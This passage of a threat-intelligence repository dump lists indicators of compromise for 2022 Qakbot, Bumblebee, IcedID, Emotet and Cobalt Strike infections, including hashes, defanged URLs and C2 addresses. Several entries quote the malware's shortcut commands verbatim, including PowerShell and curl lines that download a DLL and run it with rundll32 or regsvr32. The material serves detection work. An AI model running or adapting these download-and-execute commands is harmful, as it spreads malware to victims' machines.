https://twitter.com/k3dg3/status/1513514251788464132 11 | - Reference: https://twitter.com/Max_Mal_/status/1513539551070937093 12 | 13 | - Saw the same Cobalt Strike C2 domain and IP address on Monday 2022-04-11 for 172.241.27[.]237 using kuxojemoli[.]com. 14 | - Reference: https://twitter.com/malware_traffic/status/1513556366346137605 15 | 16 | ASSOCIATED MALWARE: 17 | 18 | - SHA256: 5c3b39ec6ffbfe05ac0246d98d6ce7287de442896c90d24e256a03da21f3ada9 19 | - File size: 817,162 bytes 20 | - File location: hxxps://geobram[.]com/ist/iseerroaemtefspidnle 21 | - File location: hxxps://geobram[.]com/ist/NO_2950435796.zip 22 | - File name: iseerroaemtefspidnle.zip 23 | - File description: ZIP archive downloaded from link in email 24 | 25 | - SHA256: 2b9861436d994bee6a332cbaf71a9fd6f157089062f414207c9effe84bf556e5 26 | - File size: 977,920 bytes 27 | - File name: 281.msi 28 | - File description: MSI file extracted from above ZIP archive 29 | 30 | - SHA256: f642fe6b372183af134c1c8cd5f806de37dcea27d6eab2ef53663d61795416e0 31 | - File size: 1,399,296 bytes 32 | - File location: C:\Users\[username]\AppData\Local\SetupTest\1.dll 33 | - File description: Windows DLL for Qakbot (aa distribution tag) 34 | - Run method: regsvr32.exe [filename] 35 | 36 | TRAFFIC TO DOWNLOAD THE INITIAL ZIP ARCHIVE: 37 | 38 | - 208.91.198[.]131 port 443 - hxxps://geobram[.]com/ist/iseerroaemtefspidnle 39 | - 208.91.198[.]131 port 443 - hxxps://geobram[.]com/ist/NO_2950435796.zip 40 | 41 | QAKBOT C2 TRAFFIC: 42 | 43 | - 47.158.25[.]67 port 443 - attempted TCP connections 44 | - 45.46.53[.]140 port 2222 - HTTPS traffic 45 | - port 443 - www.openssl[.]org - connectivity check (not inherently malicious) 46 | - 23.111.114[.]52 port 65400 - TCP traffic 47 | - 75.99.168[.]194 port 443 - HTTPS traffic 48 | 49 | COBALT STRIKE TRAFFIC: 50 | 51 | - 172.241.27[.]237 port 443 - kuxojemoli[.]com 52 | -------------------------------------------------------------------------------- /2022-04-19-IOCS-for-infection-from-Brazil-malspam.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2022-04-19-IOCS-for-infection-from-Brazil-malspam.txt -------------------------------------------------------------------------------- /2022-05-03-IOCs-for-Contact-Forms-Bumblebee-and-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-05-03 (TUESDAY) - CONTACT FORMS CAMPAIGN --> BUMBLEBEE --> COBALT STRIKE 2 | 3 | CHAIN OF EVENTS: 4 | 5 | - Contact form-generated email --> link to URL at storage.googeapis.com --> ISO file download --> Bumblebee infection --> Cobalt Strike activity 6 | 7 | NOTES: 8 | 9 | - "Contact Forms" is a campaign that has distributed IcedID, Sliver, BazarLoader, and more recently Bumblebee malware. 10 | 11 | - This campaign uses a web site's contact form to email recipients messages with malicious links to download malware. 12 | 13 | - The Contact Forms campaign most often uses a DMCA violation notice that directs victims to a "Stolen Images Evidence" web page hosted on a URL at storage.googeapis.com. 14 | 15 | - In 2021 the Contact Forms campaign also used a "DDoS Attack Proof" theme. 16 | 17 | - An initial write-up about this campaign can be found at: https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/ 18 | 19 | MALWARE RETRIEVED FROM AN INFECTED WINDOWS HOST: 20 | 21 | - SHA256 hash: c632b56628303f523b22a26231ae80836fed54df87c8a004f2d348d1b6f951b2 22 | - File size: 4,521,984 bytes 23 | - File name: StolenImages_Evidence.iso 24 | - File description: ISO file downloaded through link in contact forms email 25 | 26 | - SHA256 hash: 3c600328e1085dc73d672d068f3056e79e66bec7020be6ae907dd541201cd167 27 | - File size: 1,623 bytes 28 | - File location: StolenImages_Evidence.iso\documents.lnk 29 | - File description: Windows shortcut in the above ISO file 30 | - Windows shortcut: %windir%\system32.exe /c start 31 | rundll32.exe mkl2n.dll,KXlNkCkgFC 32 | 33 | - SHA256 hash: 0a9efce2cb38eb9e215d4ea308ccdc711659ab75b124dfd49561d6226c431ac2 34 | - File size: 3,023,872 bytes 35 | - File location: StolenImages_Evidence.iso\mkl2n.dll 36 | - File location: C:\ProgramData\96796b3c800e87fc\d99821d3530f702f.dll 37 | - File description: Bumblebee malware DLL 38 | - Run method: rundll32.exe [filename],KXlNkCkgFC 39 | 40 | - SHA256 hash: 330b74d26d0f25bd9b7cc147c9641241fea4a2a65965039c7a437ef739e51521 41 | - File size: 140 bytes 42 | - File location: C:\ProgramData\96796b3c800e87fc\d99821d3530f702f.vbs 43 | - File description: VBS file made persistent through scheduled task, used to run Bumblebee malware DLL 44 | 45 | MALWARE NOTE: 46 | 47 | - No binaries for Cobalt Strike were found saved to disk during a forensic investigation on the infected Windows host. 48 | 49 | EXAMPLE OF LINK IN CONTACT FORM-GENERATED EMAIL FOR "STOLEN IMAGES EVIDENCE" PAGE: 50 | 51 | - port 443 - hxxps://storage.googleapis[.]com/sf796cw3zbj6nk.appspot.com/sh/f/pub/m/0/fileyxuMxCXbRc2e.html?f=308238708665803200 52 | 53 | EXAMPLES OF URLS RETRIEVED BY THE ABOVE PAGE THAT RETURN BASE64 TEXT TO GENERATE ISO FILE: 54 | 55 | - 172.67.183[.]217 port 443 - hxxps://baronrtal[.]com/images/logo.jpg 56 | - 172.67.168[.]3 port 443 - hxxps://bunadist[.]com/images/logo.jpg 57 | 58 | BUMBLEBEE C2 TRAFFIC: 59 | 60 | - 45.153.243[.]93 port 443 - 45.153.243[.]93 - HTTPS traffic 61 | 62 | COBALT STRIKE TRAFFIC: 63 | 64 | - 179.60.150[.]125 port 443 - HTTPS traffic 65 | - 172.93.201[.]12 port 443 - cevogesu[.]com - HTTPS traffic 66 | - 23.106.215[.]100 port 443 - titojukus[.]com - HTTPS traffic 67 | - 108.177.235[.]172 port 443 - xemigefav[.]com - HTTPS traffic 68 | -------------------------------------------------------------------------------- /2022-05-17-IOCS-for-aa-distribution-Qakbot-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-05-17 (TUESDAY) - AA DISTRIBUTION QAKBOT (QBOT) LEADS TO COBALT STRIKE 2 | 3 | INFECTION CHAIN: 4 | 5 | - email --> link --> downloaded zip --> extracted shortcut --> Qakbot DLL --> Qakbot C2 --> Cobalt Strike activity 6 | 7 | TRAFFIC TO DOWNLOAD MALICIOUS ZIP ARCHIVE: 8 | 9 | - port 80 - http://meumundocatolico[.]com[.]br/pla/xmmuite 10 | - port 80 - http://meumundocatolico[.]com[.]br/pla/U1810259023.zip 11 | 12 | URL HOSTING QAKBOT DLL: 13 | 14 | - port 443 hxxps://smartleasesonora[.]com/yVuL6RYk/EW.png 15 | 16 | QAKBOT C2 TRAFFIC: 17 | 18 | - 38.70.253[.]226 port 2222 - HTTPS traffic 19 | 20 | COBALT STRIKE TRAFFIC: 21 | 22 | - 23.106.215[.]197 port 443 - rizucem[.]com - HTTPS traffic 23 | - 193.29.13[.]216 port 443 - svfin[.]icu - HTTPS traffic 24 | 25 | NOTES: 26 | 27 | - In April 2022, svfin[.]icu resolved to 193.29.13[.]216 and was reported publicly as Cobalt Strike. 28 | 29 | - In today's HTTPS traffic, svfin[.]icu is an at-commonName value in certificate issuer data for the associated HTTPS traffic. 30 | 31 | MALWARE RETRIEVED FROM AN INFECTED WINDOWS HOST: 32 | 33 | - SHA256 hash: f9272801e9f70757819b7d49ebd1b09ec846c1119026aacf5e1ea7f7a77e9125 34 | - File size: 864 bytes 35 | - File name: U1810259023.zip 36 | - File location: hxxp://meumundocatolico[.]com[.]br/pla/U1810259023.zip 37 | - File description: zip archive retrieved from link in email 38 | 39 | - SHA256 hash: 31aff7c4ab72817fc99d95cdde8fb48ff743a92b717a13835ce6410d126a7e0e 40 | - File size: 2,013 bytes 41 | - File name: Z81310.lnk 42 | - File description: Windows shortcut contained in above zip archive 43 | - Shortcut: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 44 | hxxps://smartleasesonora[.]com/yVuL6RYk/EW.png -OutFile $env:TEMP\z222.dll;Start-Process 45 | rundll32 $env:TEMP\z222.dll,DllInstall 46 | 47 | - SHA256 hash: 8a383f890745370e6f256396858a94062600f1efd2d1df36ef8a291e41494277 48 | - File size: 1,841,599 bytes 49 | - File location: hxxps://smartleasesonora[.]com/yVuL6RYk/EW.png 50 | - File location: C:\Users\[username]\AppData\Local\Temp\z222.dll 51 | - File type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows 52 | - File description: DLL file for Qakbot 53 | - Run method: rundll32 [filename],DllInstall 54 | -------------------------------------------------------------------------------- /2022-05-23-IOCs-for-IcedID-and-DarkVNC.txt: -------------------------------------------------------------------------------- 1 | 2022-05-23 (MONDAY) - ICEDID (BOKBOT) INFECTION WITH DARKVNC: 2 | 3 | NOTES: 4 | 5 | - Indications of this infection chain originally appeared last week. 6 | - It apparently started on Monday 2022-05-16. 7 | - The Windows shortcut file was first reported at https://twitter.com/malwrhunterteam/status/1526557532277424129 8 | - The associated files were still available online, and we used them to infect a vulnerable Windows host on Monday 2022-05-23. 9 | - This infection chain likely used email with a link to the zip-ed Windows shortcut as an initial infection vector. 10 | 11 | INFECTION CHAIN: 12 | 13 | - URL --> ZIP --> LNK --> HTA --> 64-bit EXE installer for IcedID 14 | 15 | INFECTION CHAIN STEP-BY-STEP: 16 | 17 | - hxxps://hectorcalle[.]com/May-16_2022.zip --> May-16_2022.lnk 18 | - May-16_2022.lnkÿ--> hxxps://hectorcalle[.]com/093789.hta 19 | - hxxps://hectorcalle[.]com/093789.hta --> hxxps://hectorcalle[.]com/listbul.exe 20 | - hxxps://hectorcalle[.]com/listbul.exe --> C:\Users\[username]\listbul.exe 21 | 22 | ICEDID INSTALLER TRAFFFIC FOR GZIP BINARY: 23 | 24 | - 94.140.116[.]34 port 80 - hxxp://pilatylu[.]com/ 25 | 26 | ICEDID POST-INFECTION C2 DOMAINS: 27 | 28 | - 45.86.229[.]46 port 443 - guguchrome[.]com - HTTPS traffic 29 | - 45.86.229[.]46 port 443 - attemptersnext[.]site - HTTPS traffic 30 | - 5.196.103[.]151 port 443 - hipnoguard[.]com - HTTPS traffic 31 | - 5.196.103[.]151 port 443 - sawertinoit[.]site - HTTPS traffic 32 | 33 | FOLLOW-UP MALICIOUS TRAFFIC FOR DARK VNC: 34 | 35 | - 88.119.161[.]76 port 8080 - encrypted TCP traffic 36 | 37 | MALWARE/ARTIFACTS: 38 | 39 | - SHA256 hash: 547be6f1aebb777b6b729b7b919bb5f7d7f068299f96b92b0b5e601a080c3720 40 | - File size: 1,206 bytes 41 | - File location: hxxps://hectorcalle[.]com/May-16_2022.zip 42 | - File description: zip archive, presumably called from link in malicious email 43 | 44 | - SHA256 hash: 24ee20d7f254e1e327ecd755848b8b72cd5e6273cf434c3a520f780d5a098ac9 45 | - File size: 2,559 bytes 46 | - File name: May-16_2022.lnk 47 | - File description: Malicious Windows shortcut to install IcedID malware 48 | 49 | - SHA256 hash: f59531b810bcbc677907e9fa2be65187b3ee4cd980f633775cc8b2186f3e83d2 50 | - File size: 130,835 bytes 51 | - File location: hxxps://hectorcalle[.]com/093789.hta 52 | - File description: HTA file retrieved by above Windows shortcut 53 | 54 | - SHA256 hash: 1e3d10c3c84d7617692174a1f9ae8a658eabb22c7122ef1c8f37f35641ccf7aa 55 | - File size: 3,000,000 bytes 56 | - File location: hxxps://hectorcalle[.]com/listbul.exe 57 | - File location: C:\Users\[username]\listbul.exe 58 | - File description: IcedID installer retrieved by above HTA file 59 | 60 | - SHA256 hash: 28cea90671b362b0c6408c1a031fb571b70f1086a5f40afb1be843d6123ce898 61 | - File size: 1,337,758 bytes 62 | - File location: hxxp://pilatylu[.]com/ 63 | - File description: gzip binary from pilatylu.com 64 | 65 | - SHA256 hash: dbe9743c9c57247cb9275a23a84909dd78aca59f584df62197bde07cb87bd1ed 66 | - File size: 342,186 bytes 67 | - File location: C:\Users\[username]\ApppData\Roaming\LiquidSausage\license.dat 68 | - File description: Data binary used to run persistent IcedID DLL 69 | - File note: First submitted to VirusTotal on 2022-04-15 70 | 71 | - SHA256 hash: 327006b939627d1300906e10ec00cae6092d97929b104af552c2bd18882f7df3 72 | - File size: 994,816 bytes 73 | - File location: C:\Users\[username]\ApppData\Local\[username]\fupodb32.dll 74 | - File description: 64-bit DLL for persistent IcedID infection 75 | - Run method: rundll32.exe [filename],#1 --om="LiquidSausage\license.dat" 76 | - File note: Made persistent through scheduled task 77 | -------------------------------------------------------------------------------- /2022-06-07-IOCs-for-Emotet-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-06-07 (TUESDAY) - EMOTET EPOCH 5 INFECTION WITH COBALT STRIKE AND SPAMBOT ACTIVITY 2 | 3 | NOTE: 4 | 5 | - Cobalt Strike domain and IP address previously reported on Twitter by @drb_ra (C2IntelFeedsBot) at: 6 | https://twitter.com/drb_ra/status/1532181243915296768 7 | 8 | ASSOCIATED MALWARE: 9 | 10 | - SHA256 hash: 6bbce57af634b5a56f4e412c52d987d3c2515089fc82be156c3de564564b25ba 11 | - File size: 72,704 bytes 12 | - File name: 07062022.xls 13 | - File description: Excel file with macro for Emotet epoch 5 14 | 15 | - SHA256 hash: fb81974d0004fb7c6c57d51386b654fa0e9bed01def37090106508f943b69ed3 16 | - File size: 669,116 bytes 17 | - File location: hxxps://chobemaster[.]com/components/GxCs/ 18 | - File location: C:\Users\[username]\haics1.ocx 19 | - File location: C:\Users\[username]\AppData\Local\[random letters]\[random letters].dll 20 | - File description: 64-bit DLL for Emotet epoch 5 21 | - Run method: regsvr32.exe [filename] 22 | 23 | - SHA256 hash: 5d12e2caa2dc7a0669ce5ea96e919f6c6b7669d23534ba64c55df3b63a465ca1 24 | - File size: 669,116 bytes 25 | - File location: hxxps://bencevendeghaz[.]hu/wp-includes/S1mIEUnClr5s8krOm/ 26 | - File location: C:\Users\[username]\haics2.ocx 27 | - File location: C:\Users\[username]\AppData\Local\[random letters]\[random letters].dll 28 | - File description: 64-bit DLL for Emotet epoch 5 29 | - Run method: regsvr32.exe [filename] 30 | 31 | URLS FOR EMOTET EPOCH 5 DLL: 32 | 33 | - hxxps://chobemaster[.]com/components/GxCs/ 34 | - hxxps://bencevendeghaz[.]hu/wp-includes/S1mIEUnClr5s8krOm/ 35 | - hxxp://vibesapparels[.]com/dQa/Qzuqq5TZO/ 36 | 37 | EMOTET C2 TRAFFIC: 38 | 39 | - 58.96.74[.]42 port 443 - HTTPS traffic 40 | - 62.141.45[.]103 port 443 - HTTPS traffic 41 | - 68.183.62[.]61 port 8080 - HTTPS traffic 42 | - 114.79.130[.]68 port 8080 - HTTPS traffic 43 | - 116.125.120[.]88 port 443 - HTTPS traffic 44 | - 128.199.93[.]156 port 8080 - HTTPS traffic 45 | - 134.209.164[.]181 port 8080 - HTTPS traffic 46 | - 159.65.163[.]220 port 443 - HTTPS traffic 47 | - 173.249.25[.]219 port 443 - HTTPS traffic 48 | - 190.107.19[.]180 port 8080 - HTTPS traffic 49 | - 212.83.184[.]188 port 8080 - HTTPS traffic 50 | 51 | COBALT STRIKE TRAFFIC: 52 | 53 | - 37.0.8[.]252 port 443 - lentgenn.com - HTTPS traffic 54 | 55 | SPAMBOT TRAFFIC (ENCRYPTED SMTP): 56 | 57 | - various IP addresses over TCP ports associated with SMTP like 25, 465, and 587 58 | -------------------------------------------------------------------------------- /2022-06-09-IOCs-from-TA578-Bumblebee-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-06-09 (THURSDAY) - TA578 CONTACT FORMS CAMPAIGN --> BUMBLEBEE --> COBALT STRIKE: 2 | 3 | REFERENCE: 4 | 5 | - https://twitter.com/malware_traffic/status/1534950475690295296 6 | 7 | EXAMPLE OF TA578 CONTACT FORMS CAMPAIGN "STOLEN IMAGES EVIDENCE" PAGE: 8 | 9 | - hxxps://storage.googleapis[.]com/bcxkja6v4u8de4.appspot.com/ri9s/f/d/s/f8bP4VVdWO0WA.html?d=086573710585143249 10 | 11 | URL CALLED BY THE ABOVE "STOLEN IMAGES EVIDENCE" PAGE: 12 | 13 | - hxxps://storage.googleapis[.]com/nvhhkqnv0s8nkz.appspot.com/f/fileGVxZ1t0ssa5C.html 14 | 15 | - NOTE: The above URL returned base64 text used to create a malicious zip archive for this infection 16 | 17 | ASSOCIATED MALWARE: 18 | 19 | - SHA256 hash: 5b56671835254cb265c0e2d967882eadb51a7abafd82fda3105f23ec13eca325 20 | - File size: 897,893 bytes 21 | - File name: StolenImages_Evidence.zip 22 | - File description: Downloaded zip archive from "Stolen Images Evidence" page 23 | 24 | - SHA256 hash: f3525e18d5c7384ddb59903dab5c6518b15140ce20d8c04efe1db951b4fc39cb 25 | - File size: 2,752,512 bytes 26 | - File name: StolenImages_Evidence.iso 27 | - File description: ISO image extracted from the above zip archive 28 | 29 | - SHA256 hash: e105a1d7fae4d0cb63d068b328d83d41e07b7b27b2bfdc65b2e47c5dfb90466b 30 | - File size: 2,061 bytes 31 | - File name: documents.lnk 32 | - File description: Windows shorcut contains in above ISO image 33 | - Command from shortcut: C:\Windows\System32\cmd.exe/c start docum.bat 34 | 35 | - SHA256 hash: f17420ec26a57d29eefd782b046a8c7be41bc1da1d9bf08313e6fc83ccca333e 36 | - File size: 39 bytes 37 | - File name: docum.bat 38 | - File description: Hidden batch file contained in ISO image 39 | - Batch file content: @start RunDll32 parelmo2.dll,nHqRHTKVae 40 | 41 | - SHA256 hash: f3d6cc38e35b0738ac5968f8c15404bbe17a1cc00cd6af03b99942e3d9174c8e 42 | - File size: 1,261,568 bytes 43 | - File name: parelmo2.dll 44 | - File description: 64-bit DLL for Bumblebee malware 45 | 46 | BUMBLEBEE C2 TRAFFIC: 47 | 48 | - 145.239.30[.]26 port 443 - HTTPS traffic 49 | 50 | HTTPS traffic to suspicious Amazon AWS server: 51 | 52 | - 18.118.156[.]145 port 443 - ec2-18-118-156-145.us-east-2.compute.amazonaws[.]com - HTTPS traffic 53 | 54 | COBALT STRIKE TRAFFIC: 55 | 56 | - 23.82.141[.]226 port 443 - zupeyico[.]com - HTTPS traffic 57 | 58 | SELF-SIGNED CERTIFICATE ISSUER DATA FOR BUMBLEBEE HTTPS C2 TRAFFIC: 59 | 60 | - id-at-countryName=AU 61 | - id-at-stateOrProvinceName=Some-Staste 62 | - id-at-organizationName=Internet Widgits Pty Ltd 63 | 64 | CERTIFICATE ISSUER DATA FOR HTTPS TRAFFIC TO SUSPICIOUS AMAZON AWS SERVER: 65 | 66 | - id-at-countryName=US 67 | - id-at-stateOrProvinceName=KY 68 | - id-at-organizationName=Denesik-Walsh 69 | - id-at-organizationUnitName=system 70 | - id-at-commonName=denesik.walsh.biz 71 | - pkcs-9-at-emailAddress=system@denesik.walsh.biz 72 | 73 | SECTIGO CERTIFICATE ISSUER DATA FOR COBALT STRIKE HTTPS TRAFFIC: 74 | 75 | - id-at-countryName=GB 76 | - id-at-stateOrProvinceName=Greater Manchester 77 | - id-at-localityName=Salford 78 | - id-at-organizationName=Sectigo Limited 79 | - id-at-commonName=Sectigo RSA Domain Validation Secure Server CA 80 | 81 | - NOTE: Sectigo is a legitimate Certificate Authority (CA), and criminals occasionally use Sectigo certificates for their Cobalt Strike servers. -------------------------------------------------------------------------------- /2022-06-14-IOCs-from-TA578-Bumblebee-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-06-14 (TUESDAY) - TA578 THREAD-HIJACKED EMAIL --> BUMBLEBEE --> COBALT STRIKE: 2 | 3 | REFERENCE: 4 | 5 | - https://bazaar.abuse.ch/sample/f17744df579de5a9b657299f909d32fd3ef60812f1b0d4f6e7ea518d2f571a39/ 6 | 7 | ASSOCIATED MALWARE: 8 | 9 | - SHA256 hash: f17744df579de5a9b657299f909d32fd3ef60812f1b0d4f6e7ea518d2f571a39 10 | - File size: 956,787 bytes 11 | - File name: June-14-Request-Scan_103_docx.zip 12 | - File description: zip archive attached to email 13 | 14 | - SHA256 hash: 3499d4981c2a23681954b74793976d8d99e097a905bacd2c3d4e77855e90e4d9 15 | - File size: 3,211,264 bytes 16 | - File name: June-14-Request-Scan_103_docx.iso 17 | - File description: ISO image extracted from the above zip archive 18 | 19 | - SHA256 hash: 7ea93d3194137b5e8e11609733b6d1dbefda22cc1e129e25a06e8623f2bbc3e3 20 | - File size: 2,098 bytes 21 | - File name: documents.lnk 22 | - File description: Windows shortcut contained in above ISO image 23 | - Command from shortcut: C:\Windows\System32\rundll32.exe toso3l.dll,LyirJCyvGh 24 | 25 | - SHA256 hash: 2e349b3224cc0d958e6945623098c2d28cc8977e0d45480c0188febbf7b8aa78 26 | - File size: 1,764,864 bytes 27 | - File name: toso3l.dll 28 | - File description: 64-bit DLL for Bumblebee malware 29 | - Run method: rundll32.exe [filename],LyirJCyvGh 30 | 31 | BUMBLEBEE C2 TRAFFIC: 32 | 33 | - 193.233.203[.]156 port 443 - HTTPS traffic 34 | - 39.57.152[.]217 port 440 - attempted TCP connections 35 | - 69.161.201[.]181 port 382 - attempted TCP connections 36 | 37 | COBALT STRIKE TRAFFIC: 38 | 39 | - 172.93.181[.]105 port 443 - hocavopeh[.]com - HTTPS traffic 40 | 41 | SELF-SIGNED CERTIFICATE ISSUER DATA FOR BUMBLEBEE HTTPS C2 TRAFFIC: 42 | 43 | - id-at-countryName=AU 44 | - id-at-stateOrProvinceName=Some-Staste 45 | - id-at-organizationName=Internet Widgits Pty Ltd 46 | 47 | SECTIGO CERTIFICATE ISSUER DATA FOR COBALT STRIKE HTTPS TRAFFIC: 48 | 49 | - id-at-countryName=GB 50 | - id-at-stateOrProvinceName=Greater Manchester 51 | - id-at-localityName=Salford 52 | - id-at-organizationName=Sectigo Limited 53 | - id-at-commonName=Sectigo RSA Domain Validation Secure Server CA 54 | 55 | - NOTE: Sectigo is a legitimate Certificate Authority (CA), and criminals occasionally use Sectigo certificates for their Cobalt Strike servers. 56 | -------------------------------------------------------------------------------- /2022-06-21-IOCs-for-AA-distribution-Qakbot-with-DarkVNC-and-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-06-21 (TUESDAY) - AA DISTRIBUTION QAKBOT (QBOT) WITH DARK VNC AND COBALT STRIKE 2 | 3 | INFECTION CHAIN: 4 | 5 | - Thread-hijacked email --> link --> password-protected zip --> Windows shortcut --> Qakbot --> follow-up malware 6 | 7 | EXAMPLES OF LINKS FROM EMAILS: 8 | 9 | - hxxps://drive.google[.]com/uc?export=download&id=12YCPlGhj4bO0NWSJtS8agl52ox7D8_6G&confirm=t 10 | - hxxps://drive.google[.]com/uc?export=download&id=1fsanLKV8A93QBID-3w4URnl1DGaSvXOW&confirm=t 11 | - hxxps://drive.google[.]com/uc?export=download&id=1KNl9wwEIVZ5FOyn1BruyWwIrCslFkRGp&confirm=t 12 | - hxxps://drive.google[.]com/uc?export=download&id=1ppV4rCVKnDlJVE4WJ9PfPtiThoA0VdnO&confirm=t 13 | - hxxps://drive.google[.]com/uc?export=download&id=1sVNWr2l36_fFBrG0bSDdOMR6IqaXXNuL&confirm=t 14 | - hxxps://drive.google[.]com/uc?export=download&id=1tjQ48mlBKbF4NvzCx-3h_0e6cq_qUQBU&confirm=t 15 | - hxxps://drive.google[.]com/uc?export=download&id=1WOOtmsN4AY7YT3FEXMszp9sJZEu_80aZ&confirm=t 16 | - hxxps://drive.google[.]com/uc?export=download&id=1xCZknxKBantEN9pywyVCzhd8RQUlb663&confirm=t 17 | - hxxps://drive.google[.]com/uc?export=download&id=1XpJ53bzmOLBhicqonqfAvUQZODPOb6tO&confirm=t 18 | - hxxps://drive.google[.]com/uc?export=download&id=1yZwjAU90kJUAV1o6RStf9xSLxeS2Dv9x&confirm=t 19 | - hxxps://drive.google[.]com/uc?export=download&id=1YYjRd6O7GCIAoDawI4i6fB2mjjMtSAzm&confirm=t 20 | - hxxps://drive.google[.]com/uc?export=download&id=1ZXle00cAMSdXupJwtBGB-N9OFekAYPiD&confirm=t 21 | 22 | EXAMPLE OF DOWNLOADED ZIP ARCHIVE: 23 | 24 | - SHA256 hash: 311730a296273acfbec85799b25f23b4698c8cc532ca2028a55f31c8b0686b03 25 | - File size: 1,230 bytes 26 | - File name: reiciendisperferendis.zip 27 | - File description: password-protected zip archive downloaded from link in the email 28 | - Password: E98346 29 | 30 | EXTRACTED WINDOWS SHORTCUT: 31 | 32 | - SHA256 hash: c9dfafd3536977289b4bfda1369fbd113a778cf06ac0c01cdc8e00e1c300e774 33 | - File size: 2,093 bytes 34 | - File name: reiciendisperferendis.lnk 35 | - File description: Windows shortcut extracted from the above zip archive 36 | 37 | COMMAND ISSUED BY THE ABOVE SHORTCUT: 38 | 39 | C:\Windows\System32\cmd.exe /q /c echo 'i0' && 40 | ping yrl.net && 41 | MD "%HOMEPATH%\Wc\ItF5" && 42 | curl.exe --output %HOMEPATH%\Wc\ItF5\t3JC.frZL.YXSA hxxps://maagayatrilogistics[.]com/WUK4Q/q.png && 43 | regsvr32 -u "%HOMEPATH%\Wc\ItF5\t3JC.frZL.YXSA" 44 | && ping 0Ev.com 45 | 46 | QAKBOT DLL RETRIEVED BY THE WINDOWS SHORTCUT: 47 | 48 | - SHA256 hash: 26748f1f6c740dc9ce9c480bc0fe49416b90672567cce3d77e4f16bcb92d7662 49 | - File size: 739,934 bytes 50 | - File location: hxxps://maagayatrilogistics[.]com/WUK4Q/q.png 51 | - File location: C:\Users\[username]\Wc\ItF5\t3JC.frZL.YXSA 52 | - File type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows 53 | - Run method: regsvr32.exe [filename] 54 | 55 | QAKBOT DLL PERSISTENT ON THE INFECTED WINDOWS HOST: 56 | 57 | - SHA256 hash: 8680626d35a7528e6025ca2bfc757967847bb4d0ab4c24e56083d739dfbad9dc 58 | - File size: 732,599 bytes 59 | - File location: C:\Users\[username]\AppData\Roaming\Microsoft\Ccnwa\urdvwi.dll 60 | - File type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows 61 | - Run method: regsvr32.exe [filename] 62 | 63 | TRAFFIC FROM THE QAKBOT INFECTION: 64 | 65 | - 192.185.129[.]139 port 443 - hxxps://maagayatrilogistics[.]com/WUK4Q/q.png 66 | - 76.25.142[.]196 port 443 - Qakbot HTTPS C2 traffic 67 | - port 443 - www.openssl[.]org - Connectivity check by infected Windows host 68 | - 23.111.114[.]52 port 65400 - TCP traffic caused by Qakbot 69 | - port 443 - api.ipify[.]org - IP address check by infected Windows host 70 | - various IP addresses over various ports - Email banner traffic/SMTP activity 71 | 72 | TRAFFIC CAUSED BY FOLLOW-UP MALWARE: 73 | 74 | - 78.31.67[.]7 port 443 - DarkVNC traffic 75 | - 190.123.44[.]130 port 443 - trikh[.]icu - Cobalt Strike HTTPS traffic -------------------------------------------------------------------------------- /2022-06-28-IOCs-for-TA578-IcedID-Cobalt-Strike-and-DarkVNC.txt: -------------------------------------------------------------------------------- 1 | 2022-06-28 (TUESDAY) - TA578 THREAD-HIJACKED EMAIL --> ICEDID (BOKBOT) --> DARK VNC & COBALT STRIKE 2 | 3 | ASSOCIATED MALWARE: 4 | 5 | - SHA256 hash: 458526b6a8158b015fc91b35a417ddd8a17a4b1c03c8a46574f44ee7cef4dc5a 6 | - File size: 271,967 bytes 7 | - File name: June-06028_75-Report.zip 8 | - File description: password-protected zip archive attached to TA578 thread-hijacked email 9 | - Password: 78934 10 | 11 | - SHA256 hash: fb220072b9c47db2fe824cc72c1d3073cab37bf9b80d6adbc0911abc58babb11 12 | - File size: 1,966,080 bytes 13 | - File name: June-06028_75-Report.iso 14 | - File description: ISO image extracted from the above zip archive 15 | 16 | - SHA256 hash: bb1fe6256cc9fc42bd74632871700af5f8663fe954a53378298b35c1f187f16b 17 | - File size: 2,082 bytes 18 | - File name: documents.lnk 19 | - File description: Windows shortcut from above ISO image 20 | - Shortcut: %windir%\System32\rundll32.exe r7kom.dll, #1 21 | 22 | - SHA256 hash: dea1ff9aa93653426473b13a0fbc088c3ad5849ec002a6a732d970cb6a01fa2d 23 | - File size: 461,824 bytes 24 | - File name: r7kom.dll 25 | - File description: Hidden 64-bit DLL to install IcedID from above ISO image 26 | - Run method: rundll32.exe [filename], #1 27 | 28 | - SHA256 hash: b00b6da10eb383e32cb52689b5ffac199814ef986dc140c99e14cec1ee132fdc 29 | - File size: 790,939 bytes 30 | - File location: hxxp://alionavon[.]com/ 31 | - File description: gzip binary retrieved by IcedID installer to create persistent infection 32 | 33 | - SHA256 hash: 4505dd5adb62e76a93c2a7a55823b12f54777607decf84d255a9f49719a2a8aa 34 | - File size: 448,000 bytes 35 | - File location: C:\Users\[username]\AppData\Local\[username]\Weyu\ijidwm1.dll 36 | - File description: persistent 64-bit DLL for IcedID 37 | - Run method: rundll32.exe [filename],#1 --ixjowe="[path to license.dat]" 38 | 39 | - SHA256 hash: dbe9743c9c57247cb9275a23a84909dd78aca59f584df62197bde07cb87bd1ed 40 | - File size: 342,186 bytes 41 | - File location: C:\Users\[username]\AppData\Roaming\FruitAlready\license.dat 42 | - File description: data binary used to run persistent IcedID DLL 43 | 44 | INFECTION TRAFFIC: 45 | 46 | TRAFFIC FOR GZIP BINARY: 47 | 48 | - 165.232.157[.]41 port 80 - alionavon[.]com - GET / 49 | 50 | ICEDID C2 TRAFFIC: 51 | 52 | - 151.236.30[.]114 port 443 - mioshaltikaz[.]com - HTTPS traffic 53 | - 103.208.86[.]72 port 443 - cukliosario[.]com - HTTPS traffic 54 | - 104.168.132[.]251 port 443 - plomiberka[.]com - HTTPS traffic 55 | 56 | DARK VNC TRAFFIC: 57 | 58 | - 91.238.50[.]80 port 8080 - encoded/encrypted traffic 59 | 